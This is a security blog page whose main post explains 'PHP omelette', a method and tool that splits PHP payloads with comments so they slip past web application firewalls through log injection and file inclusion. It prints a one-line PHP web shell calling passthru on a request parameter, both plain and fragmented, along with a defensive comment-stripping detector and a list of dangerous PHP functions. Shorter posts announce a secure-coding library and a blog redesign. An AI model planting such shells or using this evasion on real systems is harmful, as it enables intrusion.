Just Another Hacker

PHP omelette, code fragmentation for scripting languages

Code fragmentation is not exactly a new technique: in binary exploitation, techniques like the egg hunter and the omelette refer to various ways to bootstrap a larger payload from a smaller one. However, when I needed to bypass a modern WAF on a pentest where I could inject a user controlled value into a log file that could then be executed via LFI, I came up with this technique to fragment the payload so that, although it is split into pieces, it still executes as if it were consecutive function calls. I was waiting to release this at a future conference talk, but as Robin recently wrote a blog post using a similar technique to execute fragmented JavaScript, I thought the time was right to release it now.

Concept

The broad concept is:

  1. Everything inside the <?php ?> tags is code
  2. Everything inside /* */ multi line comments is ignored
  3. PHP parsing has some flexibility

The preferred use of this is to inject a small stager payload, but bigger files could be transformed as well.

The steps are simple enough that they can be performed manually:

  1. Add a comment after all opening tags
  2. Add a comment before all closing tags
  3. Add comments before and after semicolons
  4. Add a comment after each comma
  5. Add comments before and after opening and closing parentheses
  6. Remove duplicate comments
  7. Insert a new line before each closing multi line comment
  8. Remove empty lines

            ./omelette '<?=passthru($_GET[cmd]);?>'
            
                     _            _   _         _            _             _          _          _            _
                    /\ \         /\_\/\_\ _    /\ \         _\ \          /\ \       /\ \       /\ \         /\ \
                   /  \ \       / / / / //\_\ /  \ \       /\__ \        /  \ \      \_\ \      \_\ \       /  \ \
                  / /\ \ \     /\ \/ \ \/ / // /\ \ \     / /_ \_\      / /\ \ \     /\__ \     /\__ \     / /\ \ \
                 / / /\ \ \   /  \____\__/ // / /\ \_\   / / /\/_/     / / /\ \_\   / /_ \ \   / /_ \ \   / / /\ \_\
                / / /  \ \_\ / /\/________// /_/_ \/_/  / / /         / /_/_ \/_/  / / /\ \ \ / / /\ \ \ / /_/_ \/_/
               / / /   / / // / /\/_// / // /____/\    / / /         / /____/\    / / /  \/_// / /  \/_// /____/\
              / / /   / / // / /    / / // /\____\/   / / / ____    / /\____\/   / / /      / / /      / /\____\/
             / / /___/ / // / /    / / // / /______  / /_/_/ ___/\ / / /______  / / /      / / /      / / /______
            / / /____\/ / \/_/    / / // / /_______\/_______/\__\// / /_______\/_/ /      /_/ /      / / /_______\
            \/_________/          \/_/ \/__________/\_______\/    \/__________/\_\/       \_\/       \/__________/
            
            ============================================================================[justanotherhacker.com]===
            <?= /*
            */passthru/*
            */(/*
            */$_GET[cmd]/*
            */)/*
            */;/*
            */?>

Or if fragmenting code from a file:

            ./omelette "$(cat t/shell3.php)" > plate

The various scripts to fragment and inject the code can be found at https://github.com/wireghoul/php-omelette. While aimed at PHP, the generic methods outlined above can be applied to many languages, including JavaScript, C/C++ and others.
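As an added example from the defensive side (not code from this post or from the php-omelette project): a normalizer that strips the block comments before signature matching. Run over a constructed copy of the fragmented output above, it shows that a naive rule matching `passthru(` on the raw text misses the payload, while the comment-stripped text collapses back to the original call. The rule, the DANGEROUS list and the helper names are my own choices.

```python
import re

# Constructed copy of the fragmented omelette output shown on this page.
FRAGMENTED = "<?= /*\n*/passthru/*\n*/(/*\n*/$_GET[cmd]/*\n*/)/*\n*/;/*\n*/?>"

# A signature a naive WAF rule might use: call name followed by '('.
NAIVE_RULE = re.compile(r"\bpassthru\s*\(")

def naive_rule_hits(src: str) -> bool:
    """True if the raw, un-normalized text matches NAIVE_RULE."""
    return NAIVE_RULE.search(src) is not None

def strip_block_comments(src: str) -> str:
    """Remove /* ... */ comments, but leave ones inside string literals."""
    out, i, n, quote = [], 0, len(src), None
    while i < n:
        c = src[i]
        if quote:                            # inside a string literal
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped char verbatim
                out.append(src[i + 1])
                i += 2
                continue
            if c == quote:
                quote = None
            i += 1
        elif c in ("'", '"'):                # a string literal starts
            quote = c
            out.append(c)
            i += 1
        elif src.startswith("/*", i):        # comment: skip to after '*/'
            end = src.find("*/", i + 2)
            i = n if end == -1 else end + 2  # unterminated comment eats the rest
        else:
            out.append(c)
            i += 1
    return "".join(out)

def normalize_php(src: str) -> str:
    """Strip comments and collapse whitespace to the token stream PHP runs."""
    return re.sub(r"\s+", " ", strip_block_comments(src)).strip()

DANGEROUS = ("passthru", "system", "shell_exec", "exec", "eval")

def flag_dangerous_calls(src: str) -> list:
    """Names from DANGEROUS that are called in the normalized source."""
    flat = normalize_php(src)
    return [f for f in DANGEROUS if re.search(rf"\b{f}\s*\(", flat)]
```

The same normalization belongs in front of any log-file or upload inspection that relies on string signatures, since the PHP parser discards the comments before executing anything.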


Announcing safelity

Safelity is a proof of concept PHP library for secure coding. It was released on GitHub a while ago, but was formally introduced as part of my presentation “Codified security”, presented at GIDS today. It differs from traditional secure coding concepts in that it aims to make safe code visually identifiable when reading and writing code, while also making the library hard to use in an unsafe manner and allowing easy auditing of code written with it. Unfortunately it is a library of limited functionality, but I think it illustrates that you can make secure coding about writing secure code as opposed to trying to turn great developers into security experts.

This is predominantly inspired by Joel on Software’s post about making wrong code look wrong (https://www.joelonsoftware.com/2005/05/11/making-wrong-code-look-wrong/) and the clever engineering that makes parameterized queries/prepared statements very secure and simple to use.

You can find the code at https://github.com/wireghoul/safelity. The talk is being recorded, but may only be available on the conference website.


The new new

It’s been a while since the last revamp, but I decided to renovate the blog. All of the old content has been moved to http://archive.justanotherhacker.com. I stuck with the notion of a static site generator and wrote my own, with a little inspiration from Bashyll and Roman Zolotarev’s ssg. The design is based on PureCSS, a CSS grid layout system similar to Bootstrap but without the need for JavaScript.

There are a few upcoming project releases so check back soon!

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.
